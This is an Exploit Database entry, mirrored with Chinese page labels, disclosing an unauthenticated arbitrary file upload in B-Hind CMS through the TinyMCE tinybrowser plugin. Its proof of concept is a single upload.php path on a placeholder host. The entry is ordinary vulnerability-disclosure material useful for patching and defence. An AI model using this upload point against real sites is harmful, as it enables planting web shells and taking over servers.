B-Hind CMS (tiny_mce) – Arbitrary File Upload

Exploit Database
7 阅读

作者： innrwrld & h00die

日期： 2010-05-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12646/

####################################################
#Title: B-Hind CMS (tiny_mce) Remote File Upload
#Vendor: http://www.b-hind.eu/
####################################################
#AUTHOR: innrwrld & h00die
####################################################

#DESCRIPTION (by vendor):###########################
B-interference Lite is a simple CMS for *small websites*. Ideal for local
merchants or organizations. The content of page can be adjusted by*a simple
double click* on the text or title in question. bijmaken a page and / or
removal is easy to use buttons on the website menu.The system is naturally*
multilingual*.

#POC:###############################################
http://site.com/admin/includes/tiny_mce/plugins/tinybrowser/upload.php

#[EOF]

last Exploits
B-Hind CMS (tiny_mce) – Arbitrary File Upload的更多信息

Hewlett-Packard (HP) UCMDB – JMX-Console Authentication Bypass：
Cyberoam UTM – Multiple Vulnerabilities：
Mcard Mobile Card Selling Platform 1 – SQL Injection：
Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution：
WordPress Plugin Autoptimize 2.7.6 – Authenticated Arbitrary File Upload (Metasploit)：
Squirrelcart – ‘table’ Cross-Site Scripting：
Orchard CMS 1.7.3/1.8.2/1.9.0 – Persistent Cross-Site Scripting：
ZeusCMS 0.2 – Database Backup Dump / Local File Inclusion：